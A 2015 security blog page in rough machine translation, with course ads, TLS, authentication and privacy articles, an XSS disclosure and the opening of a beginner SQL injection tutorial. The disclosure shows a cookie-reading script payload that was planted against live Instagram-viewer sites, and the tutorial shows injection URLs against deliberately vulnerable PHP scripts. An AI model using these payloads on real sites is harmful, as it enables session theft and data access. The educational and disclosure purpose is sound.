Sunday, August 23, 2015

The Complete Wireshark Course: Go from Beginner to Advanced!

Wireshark is much easier to learn when you take this course and try everything you see for yourself! Wireshark is a free open-source packet analyzer that is the number one tool for network analysis, troubleshooting, software and communications protocol development, and related education in networking. Knowing Wireshark gives you the ability to successfully apply for network administrator jobs and easily earn money as a freelancer online because Wireshark is an in demand skill!
Use this course to speed up your learning with Wireshark with hands on tutorials showing you exactly what you can do in Wireshark founded on explanations of basic network terminology, installing Wireshark, and a review of the basic functions. The course begins with the basics and continues to dive deeper allowing you to follow along and try everything you see for yourself!
You should act on your feelings of love, hope, and faith to take this course now if you want to learn a valuable skill to use in your own company or to make money as a freelancer or employee working in a network administration job!
What are the requirements?
Have a computer capable of running wireshark.
Consistent experience with accessing the internet and working online.
What am I going to get from this course?
Over 36 lectures and 5 hours of content!
Use wireshark as an advanced user.
Apply successfully for network admin jobs.
Work as a freelancer using wireshark skills learned in this course.
See how to add a wireshark certificate to your LinkedIn profile!
What is the target audience?
Network administrators looking to build deeper knowledge of wireshark.
Entrepreneurs desiring to learn more about network protocols.
Freelancers wishing to add an in demand skill to their profile.

Learn Hacking using Backtrack 5

Welcome to "Learn Hacking using Backtrack 5". This is a course dedicated to learning the backtrack 5 Linux OS along with many of the tools it comes with. Please note that everything on this course is purely educational and we are not responsible for your actions.
Backtrack Basics: New to Backtrack? What to learn how to get started and learn the basics of hacking? Then this is where you want to start! These videos include how to install backtrack, updating tools, and the protocol to take when taking over a system.
Backtrack Intermediate: For those who want more than the basics. Includes web-based exploitation and the use of backdoors.
Backtrack wireless: That magical piece of technology that gives you access over the air-waves and its vulnerabilities.:
Metasploit is an amazing framework for exploits and updates almost everyday. These videos cover some of the things Metasploit can do, and how to use it.
Tutorials on learning to code your own exploits and other useful things for penetration testing.
What are the requirements?
Internet
A computer which you can format and experiment with
What am I going to get from this course?
Over 27 lectures and 2.5 hours of content!
Learn Backtrack
Learn Nmap
Learn Metasploit
What is the target audience?
Hackers
Web Developers

Kali Linux - Backtrack Evolved

Kali Linux is the latest Linux distribution from Offensive Security, custom-built for the distinct purposes of performing network security audits and forensic investigations. Kali comes fully loaded with hundreds of integrated tools to perform every aspect of a penetration test.
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide helps you to develop practical and useful professional skills in the information security industry, while simultaneously delivering the high level of excitement and exhilaration that goes hand-in-hand with the world of computer and network hacking.
Cyber-crime is on the rise and information security is becoming more paramount than ever before. A single attack on a company’s network infrastructure can often result in irreparable damage to a company’s assets and/or reputation.
It is no longer sufficient to merely rely on traditional security measures. In order to ensure the security of critical information assets, it is essential to become familiar with the strategies, tactics, and techniques that are used by actual hackers who seek to compromise your network.
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide will prepare you to enter the world of professional hacking by ensuring that you are well versed with the skills needed and tools used to compromise the security of enterprise networks and information systems.
About the Author
Justin Hutchens currently works as a security consultant and regularly performs penetration tests and security assessments for a wide range of clients. He previously served in the United States Air Force where he worked as an intrusion detection specialist, network vulnerability analyst and malware forensic investigator for a large enterprise network with over 55,000 networked systems. He currently holds a Bachelor’s degree in Information Technology and multiple professional information security certifications, to include CISSP (Certified Information Systems Security Professional), OSCP (Offensive Security Certified Professional), eWPT (eLearnSecurity Web-Application Penetration Tester), GCIH (GIAC Certified Incident Handler), CNDA (Certified Network Defense Architect), CEH (Certified Ethical Hacker), ECSA (EC-Council Certified Security Analyst) and CHFI (Computer Hacking Forensic Investigator).
What are the requirements?
Basic understanding of Linux and TCP/IP will be helpful in understanding the content, it is not essential.
What am I going to get from this course?
Over 40 lectures and 2.5 hours of content!
Many advanced techniques are addressed within this series, but it is still designed to simultaneously accommodate less experienced viewers. The series provides detailed explanations intended to clearly address the underlying processes involved with all tasks performed.
What is the target audience?
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide is a great choice for anybody interested in information security, penetration testing or ethical hacking. While a basic understanding of Linux and TCP/IP will be helpful in understanding the content, it is not essential.

Hacking Academy: METASPLOIT - Penetration Tests from Scratch

Learn the most popular pentesting framework: METASPLOIT.
If you are thinking about IT Security seriously - you have to get to know Metasploit. Learn how to use it, conduct attacks, find vulnerabilities and patch them.
Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit.
First complete training explained from scratch. You will see on step-by-step presentations what to do. IT Security Adacemy Expert will explain how it works and how to use Metasploit.
Take you IT Security knowledge on the next level.
What are the requirements?
General IT Knowledge
Knowledge on the level of IT Security Beginner Training
No programming skills needed
Good to know how to use Linux/Unix OS
What am I going to get from this course?
Over 9 lectures and 3 hours of content!
Learn how to use Metasploit framework
How to conduct penetrating tests on databases and applications
Learn how to conduct attacks and test vulnerabilities
How to take control over working computer machines
What is the target audience?
Future Pentesters
IT Security Professionals
IT Security Hobbists
Graduates of our IT Security Beginner Training
Graduates of our IT Security Professional Training
Programmers

BackTrack 5 Wireless Penetration Testing

Armed with the essentials, you will learn how to conduct a host of cutting edge wireless attacks. You will learn how to execute attacks such as WLAN packet sniffing, revealing hidden SSIDs, open authentication by defeating MAC address filters, bypassing shared authentication, cracking WEP and WPA/WPA2 encryption.
In addition to documenting the essentials of wireless penetration testing, we will also discuss setting up rogue APs and wireless evil twins, client-based WEP cracking attacks, wireless infrastructure-based attacks, WPS PIN brute force attacks, denial of service (DoS) attacks, eavesdropping and session hijacking, EAP-based enterprise wireless hacking; and much more. Coverage also includes various countermeasures to protect wireless networks against these types of attacks, in order to help bolster the wireless security of any given network.
About the Author
Farrukh Haroon Farhat is an information security professional with over 8 years of experience. He currently works as a Security Analyst in IBM’s Global Technology Services (GTS) division. As a member of the Managed Security Services (MSS) operations team, Farrukh works with multi-vendor network security technologies, helping customers improve their security posture. He's previously worked as the IT Security Manager for an emerging telecom operator based in the Middle East. He has also delivered various professional trainings related to Information Security and Networking. Farrukh hold’s various industry certifications such as CISSP, CISA, CCIE Security (#20184), JNCIE-Security (#91) et al. He actively contributes to various online communities related to network security like Cisco Netpro. As a result of his contribution to Cisco’s official support community, he was awarded the ‘Cisco Designated VIP (Security)’ accreditation in 2011.
What are the requirements?
The course assumes that you already know the basics of wireless networks and can operate at least one Linux distribution.
Designed as a practical video tutorial with step-by-step instructions to teach you about Wireless Penetration Testing, the course has been designed to ensure that topics are presented in a gradual manner, allowing you to grasp the information that's being presented before moving on to more advanced topics.
What am I going to get from this course?
Over 35 lectures and 3.5 hours of content!
Crack WEP, WPA, WPA2, WPS, EAP/Radius based wireless networks
Creating a practice lab for wireless penetrating testing purposes
Sniff out and analyze wireless packets from the air
Penetrate wireless networks based on the enterprise versions of WPA and WPA2
Attack the WLAN infrastructure itself using DoS attacks, Fake APs, and other techniques
What is the target audience?
This course is aimed at security professionals and IT professionals who want to learn about wireless penetration testing using the BackTrack Linux security distribution.

Advanced Penetration Testing for Highly-Secured Environments

Advanced Penetration Testing for Highly-Secured Environments will teach you how to effectively secure any environment and harden your system and network configurations. You will be able to get into the attacker’s mindset of how they target systems on a network and the overwhelming threats they pose, thereby exploiting their vulnerabilities to create a step-by-step virtual lab to protect your system.
The goal of the Advanced Penetration Testing for Highly-Secured Environments video course is to first prepare and then challenge your skills and ability to perform a full penetration test against a fictional business company. It is packed with examples that enforce enumeration, exploitation, post-exploitation, writing reports skills, and more.
To start off you will get to know the differences between penetration testing and vulnerability assessments through a structured process of starting a penetration test and finishing it with a detailed report.
If you are looking to advance in the IT security field, through advanced exploitation techniques and strategies, then this video course is for you.
About the Author
Aaron Johns currently works for Intrasect Technologies as an IT Specialist. He provides support for over 160 clients. His work roles include maintaining business networks and security policies to increase operational efficiencies and reduce costs.
Aaron also publishes videos and books for Packt Publishing, one of the most prolific and fast-growing tech book publishers in the world. He has also filmed several independent videos.
Aaron started broadcasting YouTube videos in 2007. In 2009, he was offered a partnership with YouTube. He has provided security awareness to over 1.2 million viewers and 6,300 subscribers. As of today, Aaron still serves as a Technology Partner for YouTube. He is also in partnership with Symantec Corporation and Check Point Software Technologies Ltd. You'll also find Aaron as a guest or interviewed as a security professional on several YouTube videos and podcasts.
What are the requirements?
This video course takes a progressive approach by first unraveling advanced security techniques and then applying these techniques in a fictional environment. It is thoroughly educational and gives users the opportunity to test their skills.
What am I going to get from this course?
Over 40 lectures and 3 hours of content!
Learn information gathering/Footprinting techniques and enumeration techniques
See how to gain both physical and remote access to secured systems
Navigate through the command prompt and Linux terminal along with the Backtrack 5 R3 Linux operating system
Understand the Metasploit Framework, Social-Engineering Toolkit, Nmap, Zenmap, and more
Learn how to deal with client-side exploitation attacks and advanced techniques to bypass firewalls, IDS, and IPS systems
Create a virtual penetration testing lab
Discover the usage of all the security tools
Generate a full, detailed penetration testing report
What is the target audience?
The Advanced Penetration Testing for Highly-Secured Environments video course is aimed at both newcomers and experienced professionals who wish to gain hands-on experience of advanced penetration testing. You will need elemental IT skills and concepts, knowledge of common network protocols such as TCP/IP, and a basic understanding of penetration testing.

Tuesday, February 3, 2015

Best Practice deployment SSL / TLS

Share transfer of useful articles on how to properly deploy SSL / TLS on your site. Today - the theory, the second (practical) part will be after launch.

introduction

SSL / TLS is deceptively seems simple technology. It is simple to deploy, and then it just works, without providing an adequate level of security. But the main problem lies in the fact that SSL / TLS are not easy to deploy. To TLS provides the necessary security, system administrators and developers should make an extra effort to set up their own servers and application development.

In 2009, Qualys SSL Labs began work with SSL. They wanted to understand how to use TLS, and to remedy the lack of easy-to-use tools TLS, as well as their documentation. With global research use TLS, as well as through online assessment tools Qualys SSL Labs has made some of its goals. But the lack of documentation is still making itself felt. This document is a step towards addressing this problem.

1. The private key and certificate

The quality of protection provided by TLS depends entirely on the secret key, laying the groundwork security, and a certificate of authenticity that tells the server to its visitors.

1.1 Use a 2048-bit private keys

Use a 2048-bit RSA and 256-bit ECDSA private key for all your servers. The keys of this strength are safe and will remain safe for a significant period of time. If you have a 1024-bit RSA keys, you should replace them with stronger keys as soon as possible.

1.2 Protection of the private key

Treat your private keys as an important asset, providing access to the lowest possible group of employees. Recommended action:

• Generate private keys and certificate requests (CSRs) on a trusted computer. Some offer a CA key generation and CSRs for you, but it is impractical.

• Use password protection for private keys, to prevent compromise in cases where they are stored on the backup system. Password protection for the private key does not work on the production server, because an attacker can get the keys from the process of memory. There are hardware devices that can protect the secret key, even if the server is compromised, but they are expensive and thus, only justified in organizations with high security requirements.

• After the compromise revoke old certificates and generate new keys.

• Update certificates every year and always with the new private key.

1.3 Ensure coverage of all used domain names

Make sure that your certificates cover all the domain names that you want to use on the site. For example, you have a primary domain www.example.com, but you are also using a domain www.example.net. Your goal - to avoid warnings about invalid certificates, which will confuse your users and weaken their confidence.

Even when the server is configured, only one domain name, you need to keep in mind that you can not control how users come to your site or any links to his point. In most cases, you should make sure that the certificate works with and without WWW (for example, for example.com and www.example.com). Secure Web server must have a certificate that is valid for each configured domain name. Certificates for the entire domain (Wildcard) have the advantage, but should be avoided if their use is to provide the private key large group of people, such as system administrators to different organizations. Also, keep in mind that Wildcard certificates can be used by attackers to transmit vulnerability from one web site to all other sites that use the same certificate.

1.4. Purchase certificates from a trusted Certification Authority

Choose a reputable certification authority (CA), who take care of their business and security. Consider the following criteria when choosing CA:

Related to safety

All CA pass regular audits (otherwise they would not have the right to act as a CA), but some are more serious about security than others. Find out which one is better in this respect is not easy, but one way is to study the history of their security incidents and to identify how they react to compromise and security incidents and whether they studied their mistakes.
The main activity

CA, in which the issue of certificates is the main activity, will lose business if they do something horribly wrong, and they probably will not be neglected division of certificates, pursuing potentially more lucrative opportunities elsewhere.

services offered

As a minimum, the selected CA should provide support for Certificate Revocation List (CRL) and Protocol OCSP.

Tools for managing certificates

If you need a large number of certificates, select the CA that will give you good tools to manage them.

support

Select the CA that provides good support when you need it.

1.5. Use reliable algorithms to sign the certificate

Security certificate depends on the length and strength of the private key used by the hash function. Today, most of the certificates used algorithm SHA1, which is considered weak.

You need to immediately replace all of your certificates using the algorithm SHA1, if they expire after 2015.

XSS on sites using the Instagram API

Developing an application using Instagram API, I've noticed that I do not come converted tags. Of course, this problem is solved in a couple of lines of code. But I thought, what if not all developers convert tags in effect when displayed on the page, trusting API. Who would expect that in the description page Instagram is JS script instead of text?

I found these sites.

First, add a description of the profile of a dial script js, and in the description of some photos of the line
<script> alert (document.cookie); </ script>
and several hashtags, including #instagramapi.

The first site that I found - it Iconosquare.

IconoSquare - a useful application for analyzing and managing your account in Instagram. User-friendly web interface will save time and help in communicating with subscribers. IconoSquare can browse through profiles and search for the hashtag


On this site I decided to look for your picture on the hashtag #instagramapi, in my case it was a picture of a cat.

When you click on a photo of me and burn to a page that contains the description of the photo, but Iconosquare forgotten convert html-tags in essence. This enabled the implementation of XSS.

View image
Opening the source code of the page, once it became clear that they had forgotten to convert tags in the meta description of the page.

View image
On the page, they do not resolve the name and description of the profile Instagram - and here's the result.

View image
The next site that I found - it facegram.io.

As I understand it, facegram.io - is another Instagram Web Viewer. The service has about 50,000 subscribers on Facebook, so I think it can be considered popular.

Here we are also looking for hashtag #instagramapi and here is the result:

View image
Similarly, on the user page.

In fact, I found 27 sites where you can spend XSS-attack. I think it is not necessary to paint them all, here are links to pages with XSS.

A list of all sites
I tried to write in Iconosquare and in support of a few other sites, but they did not react. Maybe someone of you can tell the developers of these sites about the vulnerability.

P.S. This article is written to tell developers that do not cost the trust received from the Instagram API data.

Two-factor authentication, which is convenient to use

Rare blog post Yandex, especially regarding security, without mentioning two-factor authentication. We thought long and hard how to strengthen the protection of user accounts, and even so that it could be used without all the inconveniences, which include the most common current implementation. But, alas, they are inconvenient. According to some reports, many major sites share of users, including additional means of authentication, does not exceed 0.1%.

It seems that this is because the common two-factor authentication scheme is too complicated and inconvenient. We have tried to think of a way that would be more convenient without losing the level of protection, and today we present its beta version.

Hopefully he will get more widespread. For our part we are ready to work on improving it and subsequent standardization.



After you enable two-factor authentication in the Data Sheet you will need to install the application Yandeks.Klyuch in App Store or Google Play. In the login form on the main page of Yandex, a mail and passport will be QR-code. To enter the account must be read QR-code through the app - and all. If we assume QR-code does not work, does not work like camera or smartphone does not have access to the internet, the application will create a one-time password, which will operate a total of 30 seconds.

I'll tell you why we decided not to use such "standard" mechanisms such as RFC 6238 and RFC 4226. How do the two-factor authentication schemes common? They are two-stage. The first stage ─ common authentication username and password. If it succeeds, the site checks "like" him this user session or not. And if the "do not like", asks the user "doautentifitsirovatsya." Common methods "doautentifikatsii" two: sending an SMS to your account tied to a phone number and password to the second generation smartphone. Mainly for generating a second password is used for TOTP RFC 6238. If the user has entered the second password is correct, the session is considered fully authenticated, and if not, the session loses and "provisional" authentication.

Both methods ─ SMS sending and password generation ─ proof of owning the phone and are therefore factor presence. The password entered in the first stage, ─ factor knowledge. Therefore, this authentication scheme ─ not only the two-stage, but also two-factor.

What struck us as problematic in this scheme?

Let's start with the fact that the computer the average user can not always be called a model of security: there are updates off Windows, and a pirate copy without modern antivirus signatures and software of dubious origin ─ all of this does not increase the level of protection. We estimate that compromise the user's computer ─ the most popular way of "stealing" accounts (and recently that was another confirmation) from it in the first place and wants to protect. In the case of a two-step authentication, if we assume that the user's computer is compromised, the password on it compromises the password itself, which is the first factor. This means that an attacker only needs to pick up the second factor. In the case of common implementations of RFC 6238 ─ second factor is 6 decimal digits (and the maximum prescribed specification, ─ 8 digits). According to the calculator bruteforce for OTP, three days attacker is able to pick up the second factor, if it somehow came to be known first. Not clear that the service can counter this attack without disturbing the normal operation of the user. The only possible proof of work ─ CAPTCHA that, in our view, is the last resort.

The second problem ─ opacity judgments about the quality of the service user's session and decide on the need to "doautentifikatsii." To make matters worse, the service is not interested in what would make the process transparent, ─ because here actually works security by obscurity. If an attacker knows, based on which service decides on the legitimacy of the session, it may attempt to forge the data. From general considerations it can be concluded that the judgment is based on the history of user authentication based on IP-addresses (and its derivatives autonomous system number that identifies the provider, and location-based geodatabase) and browser data, such as User Agent header and a set of cookies, flash lso and html local storage. This means that if an attacker controls a user's computer, it has the ability to not only steal all the necessary data, but also to take advantage of IP-address of the victim. Moreover, if the decision is made on the basis of ASN, then any authentication of public Wi-Fi at a coffee shop could lead to "poison" in terms of security (and whitewash in terms of service) provider of coffee, for example, whitewash all coffee in town . We talked about the system anomaly detection, and it can be applied, but the time between the first and second stage of authentication may not be sufficient for certain judgments about the anomaly. In addition, this same argument destroys the idea of "trusted" computers: an attacker can steal any information that affects the judgment of the proxy.

Finally, a two-step authentication simply uncomfortable: our usability-studies show that there is nothing that irritates users as an intermediate screen, additional button press and other "unimportant", from his point of view action.
For this reason, we decided that authentication should be single-stage space and passwords should be much more than can be done within the framework of "pure» RFC 6238.
At the same time we would like if possible to save two-factor authentication.

Multifactor authentication to determine whether a hedged items authentication (in fact, they are called factors) into one of three categories:
Factors knowledge (that traditional passwords, PIN codes, and all that like them);
Factors ownership (used in the OTP-schemes, as a rule, this is a smartphone, but it could be a hardware token);
Biometric factors (fingerprint ─ the most common now, although someone will remember the episode with the hero Wesley Snipes in the movie Demolition Man).

The development of our system

When we began to address the problem of two-factor authentication (the first page of the corporate wiki on this issue relate to 2012, but behind the scenes it was discussed earlier), the first idea was to take the standard authentication methods and apply them in our country. We understand that you can not count on the fact that millions of our customers buy hardware token, so this option is postponed to some exotic cases (although we totally do not refuse him, maybe we can come up with something interesting). Way with SMS too, could not be massive: it is a very unreliable way of delivery (at the crucial moment SMS may be delayed or does not reach) and sending SMS costs money (and operators have begun to increase their prices). We decided that the use of SMS ─ inheritance banks and other non-technological companies, our customers want to offer something more comfortable. In general, there was little choice: use your smartphone and program it as a second factor.

Widespread this form of one-step authentication: the user to remember the PIN code (the first factor), has on hand a hardware or software (smartphone) token generated OTP (second factor). In the password field, he enters the PIN and the current value of the OTP.

Professional development in information security

Again, the article on Infobezopasnosti, more precisely about how to become a certified specialist in information security: How and where to learn? What are the challenges to become a specialist in the field of information security? How to get a certificate for the IB recognized worldwide? The answers to all these questions in the review of our instructor CA - Kuzma Pashkov

Due to the rapid development of information technology in general and information security (IS), as a science, in particular, a specialist in information security is necessary to solve the problem of maintaining their skills. This is true for more than a decade, but nowadays the following conclusions from it about solving this problem are significantly different from those that were relevant 10 years ago. One of the main reasons for these differences is to complete the transition to a risk-based approach to the construction of automated systems in the protected execution to the normative. There are two versions of approaches:

• The risk-based approach
• Normative Approach

In an era of risk-based approach focused on building a business model and identify the necessary and sufficient conditions for meeting the requirements of security policy.

A system of protection were piece goods that are in demand mainly government agencies and large commercial organizations. To complete the work in the field of information security specialist was enough to have developed mathematical apparatus, which is produced in higher vocational education students from leading technical universities.

With all the variety of business models and established safety policy terms of their performance in the majority of cases are the same. This fact is due to let go to the normative approach of building security systems, where the focus of information security specialist devotes search, analysis and adaptation of a suitable family of open security standards. Also coated version of the automated systems become widely-popular service for all spheres of human activity.

Education IB

Thus specialist IB necessarily need to specialize in some of the following areas:

• implementation of the requirements of national laws and / or regulators (eg, access to state or commercial secrets)
• The use of certified information security specific vendors / manufacturers (engineering, commissioning, etc.).
• internationally recognized certification vendornezavisimye

Training of specialists in the first two areas spends a lot of educational institutions, both in the higher and additional vocational training. It should be understood that these areas are tied to professional employers in a particular country, but rather allow it to conduct its activities almost exclusively in the framework of national legislation and standards.



The advantages of international certification

The third area is initially focused on international open standards and methodology for information security in the hope that the developed / developing countries seek to harmonize their national legislation with international standards and in connection with the fundamental advantages of the latter. Specialist with internationally recognized certifications in the field of information security is ready to adapt their experience to work in any country, and most importantly to confirm their qualification to any employer that all else being equal gives him an advantage over other candidates for the vacancy.

Due to a number of reasons, primarily historical and political, in our country with a significant delay are adopted international standards of information security, and national legislation in this field is harmonized with the international even slower. But accelerating progress of globalization will inevitably lead us to a natural result, so an increasing number of professionals looking for IB confirm its expertise in international recognized certification.

IBM Research announced the launch of an innovative cloud technology to protect personal data

IBM researchers today announced the launch of a new cloud-based technologies that will help customers enhance the protection of their personal data on the Internet.

Technology called Identity Mixer uses a cryptographic algorithm to encrypt these confirmed the identity of the user, as his age, nationality, address and credit card number. Through the use of this technology, the user will be able to transfer to a third party only the necessary amount of personal information. Identity Mixer can be used in the electronic purse in which there is an account that is confirmed by a trusted third party, such as information from the electronic identity cards. It is important to note that the party issuing the document, receives no information about how and when the data is used.

«Identity Mixer enables users to choose what data should be provided and to whom - said Christine Petersen, director of IBM in the protection of confidential information. - Thanks to this technology, web service providers can reduce their risks and increase the confidence of customers to the resource. Furthermore, the new solution is in the cloud, which greatly facilitates the process of programming developers ".

According to comScore, the average person spends on the Internet about 25 hours per month *, with access to dozens of different Internet services, including: social networking, banking and shopping online site. For almost every site you want to create your profile with username and password or with a cryptographic key for added security. Despite the fact that these tools provide a sufficient level of safety in solving many problems, they usually do not guarantee the protection of confidential data, which leads to the disclosure of excessive amount of personal information getting into the wrong hands which is fraught with serious consequences.



As an example, consider a video streaming service that offers movies, with an age restriction. In order to see the film, recommended for persons older than 12 years, Alice needed to confirm that she is already 12 years old, and she lives in a particular region. To perform this task in the usual way Alice will need to enter the full date of birth and all the details of his address, but it will lead to the disclosure of a large amount of personal information. Identity Mixer is able to confirm that Alice is already 12 years old, without disclosing the month, date and year of birth, and to show that she is living in the region where the services are services available. Furthermore, even if the service is hacked, the personal data will be safe Alice.
If Alice is necessary to use a credit card to buy the film, video streaming service in the same way can only know that the card is valid Alice, and with it you can make a payment. Full card number and expiration date of its action is not disclosed.



Identity Mixer, previously available for download and runs on smart cards are now presented to developers as a convenient web service platform IBM Bluemix - open cloud solutions such as PaaS, combining the strengths of the software IBM, third-party and open source technologies. Since the spring, subscribers can take advantage of BlueMix Identity Mixer to optimize their applications and Web services. With a convenient drop-down menu, developers can select the types of data they want to protect, and BlueMix in turn will provide a code that can then be integrated into their life.
«Identity Mixer - the result of more than ten years of research, whose main purpose is to minimize the disclosure of identity. At the moment, this solution is ready for use when performing operations on the PC and on mobile devices, "- said Dr. Jan Kamenish, cryptographer at IBM Research and co-author of Identity Mixer.

"We wanted to ensure that every user could control the amount of personal information that he wants to give of himself, - said Dr. Anna Lisyanskii, co-author of Identity Mixer and Professor of the Department of Computer Science at Brown University. - The new cloud solution developers have at their disposal a powerful tool for cryptographic protection of personal data. Identity Mixer - a piece of software that can be built into the system Identity management in order to eliminate the possibility of breaches of confidentiality of information. "

European and Australian pilot projects to demonstrate the capabilities of Identity Mixer


To demonstrate the capabilities of the new cloud-based version of Identity Mixer, IBM scientists with academic and industrial partners in Europe and Australia are implementing a pilot project called the Authentication and Authorization for Entrusted Unions (AU2EU). During the two years of the program, worth 8.6 million. Euro Identity Mixer scientists will test two versions of application: the German Red Cross in the Commonwealth Scientific and Industrial Research Organisation (national scientific agency of Australia).

The German Red Cross is the main center for emergency assistance by telephone and social services to citizens in the regions of Germany, around the clock providing specialized services to the population, in particular conduct rescue operations, assistance with mobility, housekeeping and medical treatment. The organization employs about four million volunteers and professional staff in 52 hospitals and more than 500 nursing homes around the world.

As part of the pilot program, 20 patients of the Red Cross in the south-west of Germany were granted aid domestic activity and health monitoring and health indicators. Data collected from these devices, transferred to a dedicated cloud server, where the information is analyzed to determine the type of assistance required. In addition, representatives of the Red Cross received mobile devices for data collection and registration of confidential customer data, including information, medical records, information about medicines taken and contact relatives to the subsequent conclusion of a service contract. To protect the confidentiality of personal information will be used by Identity Mixer. The project was implemented jointly with NEC Europe and Tunstall Healthcare. **



"Our main objective for the past 150 years, is to help the victims of conflict and natural disasters, as well as other vulnerable populations, including support for people when they are sick at home, while traveling and transportation. New technologies are playing an increasingly important role in achieving this goal, especially in home alarm systems - said Carolyn Greiner, regional manager of the German Red Cross in the Rhein-Neckar and Heidelberg. - Here we offer services to senior citizens, so that they can stay at home in a comfortable and familiar environment for them. Tested technology during the project to ensure the confidentiality must guarantee to provide the most professional assistance and to ensure protection of personal data of our clients at the highest level. Only taking measures to strengthen the protection of personal information, we can maintain the trust of the people we serve around the world. "

The second pilot project aims to improve agricultural productivity and increase in Australia's export trade of relevant products without viral infections, especially in animals. To prevent the spread of viruses and the Australian Government in collaboration with key partners, has developed an emergency plan for rapid response when it detects an outbreak. This plan involves the combined efforts of government, academic and other research organizations, and industry partners to create a safe, secure and interactive environment for decision-making. Identity Mixer will ensure the timely exchange of confidential information between collaborating partners, regardless of the distance between them.

"The speed of response to human cases plays an important role in saving the lives of people or animals, - says John Zeke, chief researcher at CSIRO. - Through the use of modern technologies in the framework of this project, we are looking forward more quickly to deal with new challenges, while maintaining high levels of security, privacy and trust necessary for efficient operation. "

«Identity Mixer - a great example of how existing legislation on the protection of personal data across the world should not stop innovation. New solutions can enhance the protection of privacy by using the tools that are easier to use and accessible to providers "- adds Peters.

Test the system in demo mode here.

AU2EU - the union of industrial and academic partner organizations across Europe, and Australia, including the Technical University of Eindhoven, Philips Electronics Nederland BV, Bicore Services BV, NEC Europe Ltd, Research Center of IBM Research, German Red Cross, Thales Communications & Security SAS, State Association scientific and Industrial Research, Edith Cowan University, royal Melbourne University of Technology, University of New South Wales and Macquarie University. Further information can be found here: www.au2eu.eu.

Watch the debate about Identity Mixer, which involves IBM scientists and scientific experts to Twitter, using the hashtag #identitymixer

* Source: ComScore MMX, in December 2012 the World. Age 15+.
** Tunstall Healthcare is not part AU2EU, but ensures the implementation of telemedicine consultations for the Deutsches Rotes Kreuz.

Sunday, January 25, 2015

Modern methods of authentication and security of iOS-devices

Today we publish two new reports on our mobile developers conference #MBLTDev, which was held in late October in Moscow.

Both reports are devoted to safety: one from the head of EMEA PayPal Tim Messerschmidt about modern forms of authentication, the second - from the lead engineer for safety viaForensics Andrey Belenko about the safety of iOS-devices.

Tim called disclaims passwords and told than they can be replaced. "8.5% of users used as the Password or 123456 45% leave the site instead reset your password or secret answer. - Tim said. - To enhance safety, we suggest using PayPal in portable devices or authentication without a password (for example, OpenID). »


presentation

Andrew said that in iOS-application can go wrong, where there are security problems and how to fix them. And also, what to look for when developing applications in terms of safety and what to do, you should not.

Very interesting way to protect against SQL-injection and XSS

One highly respected me Mr Dan Kaminsky (Dan Kaminsky - known for his discovery of the fundamental vulnerability in DNS) proposed a very interesting technique universal protection against SQL injection and XSS.

The method is very simple and of genius.

The essence of art is reduced to the substitution in SQL-query all data in base64-representation and thus does not make sense to use some or parsers / analyzers used in SQL-query data (placeholders, etc.)

All this can be roughly described line type:
«SELECT * from mytable where textfield = base64_decode ('Q29vbEhhY2tlcnM =')»
where base64_decode - function of decoding base64, relalizuemaya particular database.

In the absence of the user base64 special characters and therefore no threat to our request made to him by the data will not be. No need to somehow escape or change the input. Suffice it to base64 encode it and send in the request.

Technique is also applicable on the client side - if you need to remove the data in quotes eg in the event handler or in the js. Razkodirovka of base64 can be performed directly in the js is necessary to obtain the original data.

From my point of view, the method is a genius. Deficiencies (in my opinion) the two - an increase of memory for variables stored in this way will be 30% (feature base-64 encoding), as well as increasing the load on the server because of the need to code input parameters (I think that can be ignored), and the load on the server DB because of the need razkodirvaniya (but I think this neglect will not work).
However, to be exact - to do experiments, and perhaps among habrapolzovateley have knowledgeable people ready to share their opinions on this?

SQL injection for beginners. part 1

Greetings to you, the reader. Lately, I am fond of Web-safe, and in some degree related to this work. Because I'm getting more and more began to notice themes in various forums, with a request to show how it works, I decided to write an article. Article will be designed for those who are not faced with similar, but would like to learn. In a network with respect to a number of articles on this subject, but for beginners they are a bit complicated. I will try to describe everything in plain language and detailed examples.


foreword

In order to understand this article, you do not need special knowledge of SQL-language, but at least having a good brain and a bit of patience - to remember.

I believe that one reading the article will not be enough, because we need are living examples - as it is known practice in the process of remembering, there is no excess. Therefore, we write the vulnerable scripts and train them.

What is SQL injection?

Simply put - it is an attack on the database, which will perform an action that is not to the creator of the script. Life example:

Father, mother wrote in a note that she gave Vasya $ 100 and put it on the table. Reworking it into a comic SQL language, we get:
Get it out of the bag 100 rubles and GIVE THEM Vase
That's how bad my father wrote a note (clumsy handwriting), and left it on the table, saw her brother Vasey - Peter. Peter, being a hacker, it has added "OR Pete" and received such a request:
Get it out of the bag 100 rubles and GIVE THEM OR Pete Vase
Mom read the note, she decided that she gave money Basil yesterday and gave $ 100 to Peter. Here is a simple example of SQL injection of life :) Do not filtering data (Mom barely make out the handwriting), Peter made a profit.

training

For practice, you will need to archive the original script of this article. Download it and unzip on the server. Also import the database and set the data in the file cfg.php

Search SQL injection


As you know, there is an injection of the incoming data, which are not filtered. The most common mistake - this is not filtering the transmitted ID. Well, roughly speaking substitute in all fields quotes. Whether it's a GET / POST request, and even Cookie!



Numeric input parameter

For practice, we need a script index1.php. As I said above, substitute quotes in news ID.

sqlinj / index1.php? id = 1 '


Because we request does not have a filter:

$ id = $ _GET ['id'];
$ query = "SELECT * FROM news WHERE id = $ id";


The script will understand it as
SELECT * FROM news WHERE id = 1 '


And we will give an error:
Warning: mysql_fetch_array () expects parameter 1 to be resource, boolean given in C: \ WebServ \ domains \ sqlinj \ index1.php on line 16

If the error is not issued - may be the following reasons:

1.SQL injection is not here - Filter quotes, or just standing in the conversion of (int)
2.Otklyuchen error output.

If, however, the error brought - Hooray! We found the first type of SQL injection - Numeric input parameter.


String input parameter


Requests will send to index2.php. In this file, the query is:
$ user = $ _GET ['user'];
$ query = "SELECT * FROM news WHERE user = '$ user'";


Here we make a sample news on behalf of the user, and once again - not we filter.
Again, send a request with the quote:
sqlinj / index2.php? user = AlexanderPHP '


Generates an error. Ok! So there is vulnerability. For a start we have enough - get down to practice.



Getting to action

A bit of theory


I guess you can not wait to retrieve something from this, except for errors. To begin Understand that the sign "-" is a comment in the language of SQL.

CAUTION Before and after it must be spaces. In the URL, they are transmitted as 20%

Everything that comes after the comment - will be discarded That is the query:
SELECT * FROM news WHERE user = 'AlexanderPHP' - habrahabra

Executed successfully. You can try this on a script index2.php, sending the query:

http: //sqlinj/index2.php? user = AlexanderPHP '% 20 -% 20habrahabr


